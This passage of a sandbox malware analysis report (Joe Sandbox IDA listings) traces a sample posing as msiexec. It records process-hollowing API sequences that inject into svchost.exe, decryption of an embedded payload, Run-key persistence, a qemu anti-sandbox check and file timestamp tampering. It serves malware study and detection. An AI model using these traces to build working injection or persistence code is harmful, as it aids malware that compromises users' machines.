VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 00402372
WriteProcessMemory.KERNELBASE(00000000,?,00000000,?,00000000), ref: 00402383
WriteProcessMemory.KERNELBASE(00000000,?,?,?,00000000), ref: 004023BB
WriteProcessMemory.KERNELBASE(00000000,?,00000000,00000004,00000000), ref: 004023EF
Wow64SetThreadContext.KERNEL32(?,00010007), ref: 00402408
ResumeThread.KERNELBASE(?), ref: 0040240E

Strings

GetThreadContext, xrefs: 0040232F
CreateProcessA, xrefs: 004022F2
ntdll.dll, xrefs: 00402304
D, xrefs: 004022DA
VirtualAllocEx, xrefs: 00402315
(, xrefs: 004023C5
ResumeThread, xrefs: 004022E5
NtUnmapViewOfSection, xrefs: 004022FF
WriteProcessMemory, xrefs: 00402322
SetThreadContext, xrefs: 004022C0
kernel32.dll, xrefs: 004022A4

Memory Dump Source

Source File: 00000007.00000002.365332306.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_msiexec.jbxd

Similarity

API ID: AddressProc$Process$MemoryWrite$Thread$AllocContextCreateHandleLibraryLoadModuleResumeSectionUnmapViewVirtualWow64
String ID: ($CreateProcessA$D$GetThreadContext$NtUnmapViewOfSection$ResumeThread$SetThreadContext$VirtualAllocEx$WriteProcessMemory$kernel32.dll$ntdll.dll
API String ID: 3764497115-2335503490
Opcode ID: 1a4484b91f31174b06e95d4efd592d181e7a2263aaa2955b226b527c7b6d8b7c
Instruction ID: 2101c5929532744fc004e0de8da0dcc076228160c7658ae0236a057b64dc8bda
Opcode Fuzzy Hash: 1a4484b91f31174b06e95d4efd592d181e7a2263aaa2955b226b527c7b6d8b7c
Instruction Fuzzy Hash: 4651E471900208AFDB219FA1CD49EEEBBB9FF48704F10406AFA05B61A1D7B59A50DF64

Uniqueness

Uniqueness Score: -1.00%

Function 00402493 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,00000000,75A9B136,00000000,00000000,00000000,00000000,?), ref: 004024BB
CryptAcquireContextA.ADVAPI32(00000008,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,00000008), ref: 004024CB
CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 004024DB
CryptHashData.ADVAPI32(?,?,?,00000000), ref: 004024EB
CryptDeriveKey.ADVAPI32(?,00006801,00000000,00000000,?), ref: 00402501
CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,?), ref: 00402515

Strings

Microsoft Base Cryptographic Provider v1.0, xrefs: 004024A5, 004024AC, 004024C5

Memory Dump Source

Source File: 00000007.00000002.365332306.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_msiexec.jbxd

Similarity

API ID: Crypt$AcquireContextHash$CreateDataDecryptDerive
String ID: Microsoft Base Cryptographic Provider v1.0
API String ID: 2100064926-291530887
Opcode ID: 9f9c0cb9c7ad4af4a66681f9ff8cb34f727ce906c2f2696f785b290b893db35d
Instruction ID: 6345555bd6a6a2baae484d44cd70709dcbd77d04a333a304fec5576ab75e7cf1
Opcode Fuzzy Hash: 9f9c0cb9c7ad4af4a66681f9ff8cb34f727ce906c2f2696f785b290b893db35d
Instruction Fuzzy Hash: 6A111576901118BBDF219FD5DE49ECFBF7DEF09751F108062B604B20A0D6B14A54DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00402779 Relevance: 51.1, APIs: 27, Strings: 2, Instructions: 330
filewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnvironmentVariableA.KERNEL32(TEMP,00000000,00000104,?,?,00000000), ref: 004027B6
??2@YAPAXI@Z.MSVCRT ref: 004027C1

Part of subcall function 00402419: FindResourceA.KERNEL32 ref: 00402431

??3@YAXPAX@Z.MSVCRT ref: 0040283E
??3@YAXPAX@Z.MSVCRT ref: 004029DA
MessageBoxA.USER32 ref: 00402A0B
PathCombineA.SHLWAPI(00000000,00000000,00000688), ref: 00402A56
DeleteFileA.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00402A65
PathCombineA.SHLWAPI(00000000,00000000,00000994), ref: 00402A7C
DeleteFileA.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00402A85
PathCombineA.SHLWAPI(00000000,00000000,00000890), ref: 00402A9C
DeleteFileA.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00402AA5
PathCombineA.SHLWAPI(00000000,00000000,0000078C), ref: 00402ABC
DeleteFileA.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00402AC5
PathCombineA.SHLWAPI(00000000,00000000,00000A98), ref: 00402ADC
DeleteFileA.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00402AE5
PathCombineA.SHLWAPI(00000000,00000000,00000B9C), ref: 00402AFC
DeleteFileA.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00402B05
??2@YAPAXI@Z.MSVCRT ref: 004027F9

Part of subcall function 00402493: CryptAcquireContextA.ADVAPI32(?,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,00000000,75A9B136,00000000,00000000,00000000,00000000,?), ref: 004024BB
Part of subcall function 00402493: CryptAcquireContextA.ADVAPI32(00000008,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,00000008), ref: 004024CB
Part of subcall function 00402493: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 004024DB
Part of subcall function 00402493: CryptHashData.ADVAPI32(?,?,?,00000000), ref: 004024EB
Part of subcall function 00402493: CryptDeriveKey.ADVAPI32(?,00006801,00000000,00000000,?), ref: 00402501
Part of subcall function 00402493: CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,?), ref: 00402515

GetEnvironmentVariableA.KERNEL32(APPDATA,00000000,00000104,?,?,?,?,00000000), ref: 004028A1
PathAppendA.SHLWAPI(00000000,00000064), ref: 004028B2
PathFileExistsA.SHLWAPI(00000000), ref: 004028BF
CreateDirectoryA.KERNELBASE(00000000,00000000,?,?,?,?,00000000), ref: 004028E2
??3@YAXPAX@Z.MSVCRT ref: 00402964
??3@YAXPAX@Z.MSVCRT ref: 00402B56
GetCurrentProcess.KERNEL32(00000000), ref: 00402B65
GetExitCodeProcess.KERNELBASE(00000000), ref: 00402B6C
ExitProcess.KERNEL32 ref: 00402B75

Strings

TEMP, xrefs: 004027B1
APPDATA, xrefs: 0040289C

Memory Dump Source

Source File: 00000007.00000002.365332306.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_msiexec.jbxd

Similarity

API ID: Path$File$CombineCryptDelete$??3@$Process$??2@AcquireContextCreateEnvironmentExitHashVariable$AppendCodeCurrentDataDecryptDeriveDirectoryExistsFindMessageResource
String ID: APPDATA$TEMP
API String ID: 543592474-1286462511
Opcode ID: 597e02f1118b8ffb69c02e7a48af66dc5b946ee98db13f54ee89a2e8b34cccd5
Instruction ID: f6e2236e3f10b00cdc1ba35207930b3d891378d713eead9fc05a11d1674366eb
Opcode Fuzzy Hash: 597e02f1118b8ffb69c02e7a48af66dc5b946ee98db13f54ee89a2e8b34cccd5
Instruction Fuzzy Hash: 44C15CB290011CABDF11EBA0CD89EDE77BDEB48304F1440B6EA05B6191DA749B85DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00402B8A Relevance: 16.6, APIs: 11, Instructions: 111
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__set_app_type.MSVCRT ref: 00402BB7
__p__fmode.MSVCRT ref: 00402BCC
__p__commode.MSVCRT ref: 00402BDA
__setusermatherr.MSVCRT ref: 00402C06
_initterm.MSVCRT ref: 00402C1C
__getmainargs.MSVCRT ref: 00402C3F
_initterm.MSVCRT ref: 00402C4F
GetStartupInfoA.KERNEL32 ref: 00402C8E
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00402CB2
exit.MSVCRT ref: 00402CC2
_XcptFilter.MSVCRT ref: 00402CD4

Memory Dump Source

Source File: 00000007.00000002.365332306.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_msiexec.jbxd

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
String ID:
API String ID: 801014965-0
Opcode ID: d8f85fa23656ef79cabd7502bc477eafebd37bb0cf6d586a30fbf6c3dacf0e68
Instruction ID: 2fb94ac4d71d2bac72fea6894e204766db09a3009eb5ffa048212170574d12fd
Opcode Fuzzy Hash: d8f85fa23656ef79cabd7502bc477eafebd37bb0cf6d586a30fbf6c3dacf0e68
Instruction Fuzzy Hash: 3B413375844348AFE7249FA4DF8DAAD7BB8BB09714F20013BE541B72E1D7B85841CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00402150 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 53
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

??2@YAPAXI@Z.MSVCRT ref: 00402162
??3@YAXPAX@Z.MSVCRT ref: 00402183
??2@YAPAXI@Z.MSVCRT ref: 00402192
LoadLibraryA.KERNEL32(Ntdll.dll), ref: 004021A5
GetProcAddress.KERNEL32(00000000,RtlDecompressBuffer), ref: 004021B1
??3@YAXPAX@Z.MSVCRT ref: 004021CE

Strings

RtlDecompressBuffer, xrefs: 004021AB
Ntdll.dll, xrefs: 004021A0

Memory Dump Source

Source File: 00000007.00000002.365332306.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_msiexec.jbxd

Similarity

API ID: ??2@??3@$AddressLibraryLoadProc
String ID: Ntdll.dll$RtlDecompressBuffer
API String ID: 2852400082-662685767
Opcode ID: 7787bc536107e3c50eb459c9c007716404211b6839400d8fdc558572799896aa
Instruction ID: 531a7ec942284e6b34a3e9cc2ffd4a3043220942f7d98ccca6845493d414fb18
Opcode Fuzzy Hash: 7787bc536107e3c50eb459c9c007716404211b6839400d8fdc558572799896aa
Instruction Fuzzy Hash: E901C476900119BFCF049FA4DD4AEDE77B9EF08314F000069FA05B7190D6B56A04CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00402419 Relevance: 9.0, APIs: 6, Instructions: 50
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceA.KERNEL32 ref: 00402431
SizeofResource.KERNEL32(00000000,00000000,?,?,00000000), ref: 00402443
LoadResource.KERNEL32(00000000,00000000,?,?,00000000), ref: 00402452
LockResource.KERNEL32(00000000,?,?,00000000), ref: 00402459
Sleep.KERNELBASE(00000064,?,?,00000000), ref: 00402463
??2@YAPAXI@Z.MSVCRT ref: 00402471

Memory Dump Source

Source File: 00000007.00000002.365332306.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_msiexec.jbxd

Similarity

API ID: Resource$??2@FindLoadLockSizeofSleep
String ID:
API String ID: 3568076173-0
Opcode ID: e3d05aab11850eded8a7556daf18238524d26a7001681dbed2145af7907fd7d4
Instruction ID: 703fe47ab0b1aed84f9ae8a5fdc7b2922fb639b0f7b03c34cd0379616ea940cd
Opcode Fuzzy Hash: e3d05aab11850eded8a7556daf18238524d26a7001681dbed2145af7907fd7d4
Instruction Fuzzy Hash: 0401A272600221AFC7209F79DD4CE6F7BE9EF8D761F104429FA85E3290D6788880CB65

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040266C Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 98
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCommandLineA.KERNEL32(00000104,00000000), ref: 00402677
PathGetArgsA.SHLWAPI(00000000), ref: 00402680
??2@YAPAXI@Z.MSVCRT ref: 004026A0
??2@YAPAXI@Z.MSVCRT ref: 004026A9
GetEnvironmentVariableA.KERNEL32(00000670,00000000,00000104,?), ref: 004026F1
PathCombineA.SHLWAPI(00000000,00000000,00000064), ref: 0040270B
PathCombineA.SHLWAPI(00000000,00000000,-000005A8), ref: 0040271B
lstrlenA.KERNEL32(00000000), ref: 0040271E
lstrcatA.KERNEL32(j(@,00402134), ref: 00402745
lstrcatA.KERNEL32(?,00000000), ref: 00402754
??3@YAXPAX@Z.MSVCRT ref: 00402759
??3@YAXPAX@Z.MSVCRT ref: 0040275F
lstrcpyA.KERNEL32(j(@,00000000), ref: 0040276C

Strings

j(@, xrefs: 00402769, 00402724, 00402735

Memory Dump Source

Source File: 00000007.00000002.365332306.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_msiexec.jbxd

Similarity

API ID: Path$??2@??3@Combinelstrcat$ArgsCommandEnvironmentLineVariablelstrcpylstrlen
String ID: j(@
API String ID: 1848265983-2441115870
Opcode ID: 3c6b8aff4d8e67542f72917e5a93f8b16faca7c1993018cc778e733412f8d674
Instruction ID: 20b46665c5c392077cfaf8139bb222d8e5b4c3735ced006ec0b8e3afc4d8f7d2
Opcode Fuzzy Hash: 3c6b8aff4d8e67542f72917e5a93f8b16faca7c1993018cc778e733412f8d674
Instruction Fuzzy Hash: A9319032500218AFDF11AF64DD88ADE7BB9EB08354F1040B6F945B72E1DAB95A80CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00402520 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 110
registryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000001,00000000), ref: 00402552
GetEnvironmentVariableA.KERNEL32(00402F66,?,00000104), ref: 004025AC
PathCombineA.SHLWAPI(?,?,0040295A), ref: 004025CD
PathCombineA.SHLWAPI(?,?,0040234E), ref: 004025E4
PathUnquoteSpacesA.SHLWAPI(?), ref: 004025F3
CopyFileA.KERNEL32 ref: 00402604
PathQuoteSpacesA.SHLWAPI(?), ref: 00402614
RegOpenKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000), ref: 00402628
lstrlenA.KERNEL32(?), ref: 00402635
RegSetValueExA.ADVAPI32(00000000,004028F6,00000000,00000001,?,00000000), ref: 0040264C
RegCloseKey.ADVAPI32(00000000), ref: 00402655
PathUnquoteSpacesA.SHLWAPI(?), ref: 00402662

Strings

Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0040261E

Memory Dump Source

Source File: 00000007.00000002.365332306.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_msiexec.jbxd

Similarity

API ID: Path$Spaces$CombineFileUnquote$CloseCopyEnvironmentModuleNameOpenQuoteValueVariablelstrlen
String ID: Software\Microsoft\Windows\CurrentVersion\Run
API String ID: 2107585506-1428018034
Opcode ID: 83fca13ebf4ad39da448c043303d9b21502982656c2de3e17278bbeabd522527
Instruction ID: a86aad1d29e7a7895c0fb444d9a4815063da67e6701978e6f822172513d27bf4
Opcode Fuzzy Hash: 83fca13ebf4ad39da448c043303d9b21502982656c2de3e17278bbeabd522527
Instruction Fuzzy Hash: 80311DB690425CBFDB11DBA4DD44ACABB7CAB48344F1044B6E689F2150DA709BC88FA4

Uniqueness

Uniqueness Score: -1.00%

Function 004021DC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 68
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PathCombineA.SHLWAPI(?,00000000,00000000), ref: 0040220F
SetFileAttributesA.KERNEL32(?,00000080), ref: 00402228
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 0040223C
WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0040225E
CloseHandle.KERNEL32(?), ref: 00402267
SetFileAttributesA.KERNEL32(?,00000080), ref: 00402275
ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,?), ref: 0040228B

Strings

open, xrefs: 00402285

Memory Dump Source

Source File: 00000007.00000002.365332306.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_msiexec.jbxd

Similarity

API ID: File$Attributes$CloseCombineCreateExecuteHandlePathShellWrite
String ID: open
API String ID: 1472231245-2758837156
Opcode ID: f51bcf8fff26897ea240e9d3aae106b4200d1664d093c1129e96391cb81a67ab
Instruction ID: b8440b774cbbe2fa9ab760de7017495f46494a0c5c1a7f4db0f29674fa40f498
Opcode Fuzzy Hash: f51bcf8fff26897ea240e9d3aae106b4200d1664d093c1129e96391cb81a67ab
Instruction Fuzzy Hash: 3E119AB580025CBBDF209FA4DD88EDB3F7DEB08390F1045A5B619A20A1D6309A848FA0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: msiexec.exePID: 2948, Parent PID: 2748COMMON

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 001E00C0 Relevance: 66.8, APIs: 34, Strings: 4, Instructions: 288
nativestringthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 001E00CB
VirtualAlloc.KERNEL32(00000000,00008000,00001000,00000004,00000000), ref: 001E00E1
GetModuleFileNameW.KERNEL32(00000000,?,00008000,00000000,00008000,00001000,00000004,00000000), ref: 001E00FB
SetEnvironmentVariableW.KERNEL32(src,?,00000000,?,00008000,00000000,00008000,00001000,00000004,00000000), ref: 001E0108
GetWindowsDirectoryW.KERNEL32(?,00008000,src,?,00000000,?,00008000,00000000,00008000,00001000,00000004,00000000), ref: 001E0115
NtQueryInformationProcess.NTDLL(000000FF,0000001A,00000000,00000004,00000000), ref: 001E0135
lstrcatW.KERNEL32(?,\system32\wuauclt.exe), ref: 001E0148
lstrcatW.KERNEL32(?,\syswow64\svchost.exe), ref: 001E0157
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001E0171
NtCreateSection.NTDLL(?,00000004,00000000,00000000,00000002,01000000,?), ref: 001E0196
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000002), ref: 001E01C0
NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 001E01FD
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000004), ref: 001E0227
NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 001E026A
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000004), ref: 001E0294
CreateProcessW.KERNEL32(00000044,?,00000044,00000044,00000044,00000004,00000044,00000044,00000044,?), ref: 001E02D5
NtDelayExecution.NTDLL(00000000,FFF0BDC0), ref: 001E02F6
NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 001E0300
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,FFF0BDC0,00000001,00000000,00000040), ref: 001E0326
NtClose.NTDLL(?), ref: 001E0336
GetThreadContext.KERNEL32(?,00010002), ref: 001E0368
NtUnmapViewOfSection.NTDLL(?,?), ref: 001E0381
NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 001E038B
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,FFF0BDC0,00000001,00000000,00000040), ref: 001E03B1
NtResumeThread.NTDLL(?,00000000), ref: 001E03C2
NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 001E03CE
NtClose.NTDLL(?), ref: 001E03D6
NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 001E03E0
NtClose.NTDLL(?), ref: 001E03E8
NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 001E03F2
NtClose.NTDLL(?), ref: 001E03FA
CloseHandle.KERNEL32(?), ref: 001E0402
VirtualFree.KERNEL32(?,00000000,00008000,?,00008000,src,?,00000000,?,00008000,00000000,00008000,00001000,00000004,00000000), ref: 001E0411
ExitProcess.KERNEL32(00000000,00000000,00008000,00001000,00000004,00000000), ref: 001E0418

Strings

D, xrefs: 001E02B8
\syswow64\svchost.exe, xrefs: 001E014F
\system32\wuauclt.exe, xrefs: 001E0140
src, xrefs: 001E0103

Memory Dump Source

Source File: 00000008.00000002.365716053.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e0000_msiexec.jbxd

Similarity

API ID: Section$View$Unmap$CloseCreate$Process$FileHandleModuleThreadVirtuallstrcat$AllocContextDelayDirectoryEnvironmentExecutionExitFreeInformationNameQueryResumeVariableWindows
String ID: D$\system32\wuauclt.exe$\syswow64\svchost.exe$src
API String ID: 934615610-414133456
Opcode ID: 2f79d31048df261f855bc04d0ebc61e6076aada8796389fcf184e2932ed4cc2f
Instruction ID: 26026d3dca783819cbb741bba8f1551c30a18ca4ec9fc1a1a278b667e20f602b
Opcode Fuzzy Hash: 2f79d31048df261f855bc04d0ebc61e6076aada8796389fcf184e2932ed4cc2f
Instruction Fuzzy Hash: 18A119B1940649BEEF169BA5CD06FEEB7B9EB1C710F104219F714B61D1E7F0A9808B24

Uniqueness

Uniqueness Score: -1.00%

Function 0040141C Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 227
registryprocessmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00008007), ref: 004014D3
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004014E4
Process32First.KERNEL32(?,00000128), ref: 004014FD
Process32Next.KERNEL32(?,00000128,?,?), ref: 0040158D
CloseHandle.KERNELBASE(?), ref: 0040159B
RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020019,?,74737973,635C6D65,65727275,6F63746E,6F72746E,7465736C,7265735C,65636976,69645C73,655C6B73,006D756E), ref: 00401682
RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,00000030), ref: 004016A7
VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004016C0
RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,?,00000030), ref: 004016E9
VirtualFree.KERNELBASE(?,00000000,00008000,?), ref: 00401716
RegCloseKey.KERNEL32(?), ref: 0040171F

Strings

kernel32.dll, xrefs: 00401445
qemu, xrefs: 0040173A

Memory Dump Source

Source File: 00000008.00000002.365771183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_msiexec.jbxd

Similarity

API ID: CloseProcess32QueryValueVirtual$AllocCreateErrorFirstFreeHandleModeNextOpenSnapshotToolhelp32
String ID: kernel32.dll$qemu
API String ID: 3416793138-845065503
Opcode ID: 2e631d7524987b0bd2e47c759a5ff12424a88cbcc9a4f19d0c3fb3083ec3de41
Instruction ID: 468c751b226159dc199a135d671abf22a65772dcafaf88a47907e385a4693d6d
Opcode Fuzzy Hash: 2e631d7524987b0bd2e47c759a5ff12424a88cbcc9a4f19d0c3fb3083ec3de41
Instruction Fuzzy Hash: 2F816F70D00219ABDF259BA5DD49FEEB6B9AF04344F104076F904F62E0EB75DE408B59

Uniqueness

Uniqueness Score: -1.00%

Function 004017AF Relevance: 5.5, Strings: 4, Instructions: 523
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

qemu, xrefs: 0040173A
|, xrefs: 0040193D
>>D?, xrefs: 00401B96
r, xrefs: 004017B1

Memory Dump Source

Source File: 00000008.00000002.365771183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_msiexec.jbxd

Similarity

API ID:
String ID: >>D?$qemu$r$|
API String ID: 0-3285580769
Opcode ID: 1a392441aa8856709dca4c86d266e29f63927c66334f18aeb310f7c0d4764a56
Instruction ID: 6bb0507b81e2be8d2a0440dca3e1e658e6d3b306f004734f08b6d44302c3b898
Opcode Fuzzy Hash: 1a392441aa8856709dca4c86d266e29f63927c66334f18aeb310f7c0d4764a56
Instruction Fuzzy Hash: 02F1DE325193819FD722DF3489856D6BFA4EF43324B2806EED4D19B2A3D3388947CB85

Uniqueness

Uniqueness Score: -1.00%

Function 00401284 Relevance: 1.6, APIs: 1, Instructions: 107
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000040,?,940959B9,?,E4105E5C), ref: 004012F9

Memory Dump Source

Source File: 00000008.00000002.365771183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_msiexec.jbxd

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: a363f6005b41687ada2095bafe0eddf377c622b55124c9d0354192962db49b21
Instruction ID: ad6a7e30c07a5fb5cab8b2019c34c62f16c151d363a2bd10c2ef0f32770b5323
Opcode Fuzzy Hash: a363f6005b41687ada2095bafe0eddf377c622b55124c9d0354192962db49b21
Instruction Fuzzy Hash: 79414F71A0020AAFDF01DFA5C881BAEB7B5EF08314F148176AD10BB2E5D739E951CB65

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: svchost.exePID: 1740, Parent PID: 2948COMMON

Executed Functions

Function 000219D1 Relevance: 73.7, APIs: 37, Strings: 5, Instructions: 243
registryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,00008000,00001000,00000004), ref: 000219E5
VirtualAlloc.KERNEL32(00000000,00008000,00001000,00000004,00000000,00008000,00001000,00000004), ref: 00021A03
ExpandEnvironmentStringsW.KERNEL32(?,00008000,00000000,00008000,00001000,00000004,00000000,00008000,00001000,00000004), ref: 00021A21
lstrcatW.KERNEL32(?,\Local Settings), ref: 00021A2E
CreateDirectoryW.KERNEL32(?,00000000,?,\Local Settings,?,00008000,00000000,00008000,00001000,00000004,00000000,00008000,00001000,00000004), ref: 00021A38
lstrcatW.KERNEL32(?,\Temp), ref: 00021A45
CreateDirectoryW.KERNEL32(?,00000000,?,\Temp,?,00000000,?,\Local Settings,?,00008000,00000000,00008000,00001000,00000004,00000000,00008000), ref: 00021A4F
GetShortPathNameW.KERNEL32(?,?,00008000), ref: 00021A5F
lstrcpyW.KERNEL32(?,?), ref: 00021A6A
lstrlenW.KERNEL32(?,?,?,?,?,00008000,?,00000000,?,\Temp,?,00000000,?,\Local Settings,?,00008000), ref: 00021A72
lstrcmpiW.KERNEL32(?,?,?,?,?,?,?,00008000,?,00000000,?,\Temp,?,00000000,?,\Local Settings), ref: 00021A95
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00021AAD
VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,?,?,00008000,?,00000000,?,\Temp,?), ref: 00021CD1

Part of subcall function 00021833: GetTickCount.KERNEL32(?), ref: 0002183C
Part of subcall function 00021833: RtlAllocateHeap.NTDLL(00000000,00000080,?), ref: 0002185E
Part of subcall function 00021833: RtlRandom.NTDLL(?), ref: 0002187D

wsprintfW.USER32 ref: 00021ADC
HeapFree.KERNEL32(00000000), ref: 00021AF6
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 00021B0F
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000006,00000000), ref: 00021B31
ReadFile.KERNEL32(?,?,00008000,?,00000000), ref: 00021B55
WriteFile.KERNEL32(?,?,?,00000000,?), ref: 00021B72
CloseHandle.KERNEL32(?), ref: 00021B7C
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00021BA6
GetFileTime.KERNEL32(?,?,?,?,?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,40000000,00000000,00000000), ref: 00021BBD
CloseHandle.KERNEL32(?), ref: 00021BC5
SetFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,80000000,00000001,00000000,00000003,00000080,00000000,?), ref: 00021BDC
CloseHandle.KERNEL32(?), ref: 00021BE7
lstrcpy.KERNEL32(?,?), ref: 00021BF5
RegCreateKeyExA.ADVAPI32(?,00000000,00000000,00000000,00040000,00000000,?,00000000,?,?,?,?,?,?,?,?), ref: 00021C13
ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(D:(A;;KA;;;WD),00000001,?,00000000), ref: 00021C2D
RegSetKeySecurity.ADVAPI32(?,00000004,?,D:(A;;KA;;;WD),00000001,?,00000000,?,00000000,00000000,00000000,00040000,00000000,?,00000000,?), ref: 00021C3A
RegCloseKey.ADVAPI32(?,?,00000004,?,D:(A;;KA;;;WD),00000001,?,00000000,?,00000000,00000000,00000000,00040000,00000000,?,00000000), ref: 00021C4A
